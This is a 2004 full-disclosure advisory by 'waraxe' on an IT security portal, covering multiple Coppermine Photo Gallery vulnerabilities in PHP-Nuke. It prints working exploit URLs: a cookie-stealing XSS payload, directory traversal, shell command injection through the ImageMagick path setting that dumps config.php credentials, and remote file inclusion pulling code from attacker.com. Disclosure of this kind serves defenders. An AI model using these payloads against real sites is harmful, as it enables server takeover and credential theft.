Waraxe IT Security Portal
Login or Register
January 7, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 60
Members: 0
Total: 60
Full disclosure
Multiple vulnerabilities in CTFd versions <= 3.7.4
IBMi Navigator / CVE-2024-51464 / HTTP Security Token Bypass
IBMi Navigator / CVE-2024-51463 / Server Side Request Forgery(SSRF)
CyberDanube Security Research 20241219-0 | Authenticated Remote Code Execution in Ewon Flexy 205
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
[waraxe-2004-SA#026] - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke





Author: Janek Vind "waraxe"
Date: 29. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=26


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Coppermine Photo Gallery 1.2.2b for CMS
Copyright (C) 2002,2003 Gr?gory DEMAR <gdemar@wanadoo.fr>
http://www.chezgreg.net/coppermine/
Updated by the Coppermine Dev Team http://coppermine.sf.net/team/
New Port by GoldenTroll
http://coppermine.findhere.org/
Based on coppermine 1.1d by Surf http://www.surf4all.net/
http://coppermine.findhere.org

I have tested two versions of the Coppermine: 1.2.2b and 1.2.0 RC4, which i will name
further as "new version" and "old version".


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

Many scripts in Coppermine software package are not protected against direct access,
therefore standard php error messages can be provoked, which leads to exposure the full
path to the scripts. Such piece of information has great value for potential attacker, who
will use this in next steps of hacking.

Version scope: both new and old versions are affected.

Examples:

http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
http://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php



B. Cross-site scripting aka XSS:

Can be used by potential attacker for stealing cookies and doing other operations, which in
normal conditions are not permitted by browser's cross-domain security restrictions.

Version scope: only new version is affected.

Examples:

http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">[xss code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>


C. Arbitrary directory browsing (needs nuke admin rights!):

PhpNuke is known by the many security bugs, leading to admin account overtaking by attacker.
So needing of the admin rights to use this exploit is not such big restriction ...

Version scope: both new and old versions are affected.

Example:

http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

... and we can see PhpNuke's root directory structure ;)


D. Execution of the arbitrary shell commands in server (needs nuke admin rights!):

Yes, again we need PhpNuke admin privileges to accomplish this exploit, but as said before,
there are many ways to compromise nuke's admin account.

Version scope: both new and old versions are affected.

So, how we can give any shell commands to server?
Let's look at Coppermine's original source in "coppermine/include/picmgmtbatch.inc.php":


// Method for thumbnails creation
switch ($method) {
case "im" :
if (preg_match("#[A-Z]:|\\#Ai", __FILE__)) {
// get the basedir, remove '/include'
$cur_dir = "";
$src_file = '"' . strtr($src_file, '/', '') . '"';
$im_dest_file = str_replace('%', '%%', ('"' . strtr($dest_file, '/', '') . '"'));
} else {
$src_file = escapeshellarg($src_file);
$im_dest_file = str_replace('%', '%%', escapeshellarg($dest_file));
}

$output = array();
$cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} -geometry {$destWidth}x{$destHeight} $src_file $im_dest_file";

//die("$cmd");

exec ($cmd, $output, $retval);

if ($retval) {
$ERROR = "Error executing ImageMagick - Return value: $retval";
if ($CONFIG['debug_mode']) {

As we can see, there is very dangerous php function "exec()" in use and some user input -
variables "$src_file" and "$dest_file" - are sanitized by "escapeshellarg()". All seems to be ok?
Yes... oops... what about config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc ?
Coppermine's authors were assuming, that those variables are safe to use directly in "exec()"...
But if we have nuke admin rights, we can manipulate those configuration parameters and therefore
various shell commands can be injected to "exec()"!
You wanna details? Go to Coopermine's conficuration panel and set "Method for resizing images" to
"Image Magick". Next set "Path to ImageMagick" to value, which includes shell command, you want to execute in server.
Example "path" in case of windows server: "type config.php > config.txt &" ,
linux server: "cat config.php > config.txt ;" .
Now "save new configuration", then upload some pictures to server and go to "Batch add pictures".
And if all went right, then you will see "config.txt" file in phpnuke root directory, so anyone can
see in plaintext information with critical value - database name, username and password ;)
Of course, skilled attacker can within 5 minutes get remote shell running in server through
arbitrary port (higher than 1024) and next hacking is not logged anymore, because webserver is bypassed.
One more step - finding and using local r00t exploit - and server is 0wned ;)


E. Remote file inclusion:

Version scope: both new and old versions are affected (different bugs in different scripts).

There exists remote file inclusion vulnerabilities in Coppermine Photo Gallery, which
can lead to arbitrary php code parsing, shell commands injection, etc. And as discussed before,
finally this can lead to total compromise of the victim server.

E1 - affected is old version:

First get ready your php script in "http://attacker.com/include/functions.inc.php" and then:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com



E2 - affected is new version:

First get ready your php script in "http://attacker.com/user_list_info_box.inc" and then:

http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

Of course, attacker's server, where those scripts are, must NOT PARSE PHP!!

See ya!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2005-01-06 (65840 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
Cybercrime news
Corrupted Microsoft Office Documents Used In Phishing Campaign
Russia Gives Life Sentence To Hydra Dark Web Kingpin After Seizing A Ton Of Drugs
Severity Of Risk Facing The UK Is Widely Underestimated
Hackers Stole $1.49 Billion In Cryptocurrency To Date In 2024
CyberVolk Analysis Explores Ransomware, Hacktivism Connections
Cyberattacks Cost British Businesses $55 Billion In Past 5 Years
Here's What Happens If You Don't Layer Network Security Or Remove Unused Web Shells
Russian Women Stepping Up For Cybercrime Outfits
Five Scattered Spider Suspects Indicted For Phishing And Heists
Crooks Snag $250k Wire Payment From AI Biz
Ransomware Attack On Oklahoma Medical Center Impacts 133,000
New GoIssue Tool Targets GitHub Devs And Corporate Supply Chains
Dark Web Crypto Laundering Kingpin Sentenced To 12.5 Years In Prison
FBI Warns US Organizations Of Fake Emergency Data Requests
Hackers Are Stealing Tickets From Ticketmaster Accounts
Scattered Spider, BlackCat Claw Their Way Back From The Undergound
Cybercrooks Are Targeting Bengal Cat Lovers In Australia
Operation Synergia II Sees Interpol Swoop On Global Cyber Crims
Rhysida Ransomware Attack On Columbus Claimed 500k Victims
Malware Operators Use Copyright Infringement To Lure In Businesses
North Korean Nation State Threat Actor Using Play Ransomware
Dutch Cops Pwn The Redline And Meta Infostealers, Leak VIP Aliases
Senator Accuses Sloppy Domain Registrars Of Aiding Russian Disinfo Campaigns
100 Million Impacted By Change Healthcare Attack
Detective Charged With Purchasing Stolen Credentials
Hacker news
Hackers Stole $1.49 Billion In Cryptocurrency To Date In 2024
Russian Hacker With $10 Million Bounty On His Head Reportedly Arrested
New York Fines GEICO And Travelers $11.3 Million In Data Breach Cases
Feds Seek To Grill Kansas City Man With Hacking Charges
ProjectSend Vulnerability Exploited In The Wild
CyberVolk Analysis Explores Ransomware, Hacktivism Connections
Russian Cyberspies Hacked Building Across Street From Target For W-Fi Attack
Five Scattered Spider Suspects Indicted For Phishing And Heists
North Korean Hackers Behind 2019 $42 Million Ethereum Heist
Equinox Notifies 21,000 Patients And Staff Of Data Theft
Palo Alto Sounds Alarm Over PAN-OS Zero Day Attacks
Thousands Of IoT Devices Turned Into Residential Proxies
Discontinued GeoVision Products Targeted In Botnet Attacks
Ransomware Attack On Oklahoma Medical Center Impacts 133,000
300 Drinking Systems In US Exposed To Disruptive, Damaging Hacker Attacks
Webscout Is Worth Checking Out
Palo Alto Networks Confirms New Firewall Zero-Day Exploitation
Known Brand, Gov Domains Hijacked Via Sitting Ducks Attacks
Man Gets 5 Years For Laundering Crypto From Bitfinex Hack
Two Men Charged For Hacking US Tax Preparation Firms
Iranian Threat Group Targets Aerospace Workers With Fake Job Lures
Citrix, Cisco, Fortinet Zero-Days Among 2023's Most Exploited Vulnerabilities
Ahold Delhaize Cybersecurity Incident Impacts Giant Food, Hannaford
Remcos RAT Now Exploiting Microsoft Excel Files
Amazon Confirms Employee Data Exposed In Leak Linked TO MOVEit Vulnerability
Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds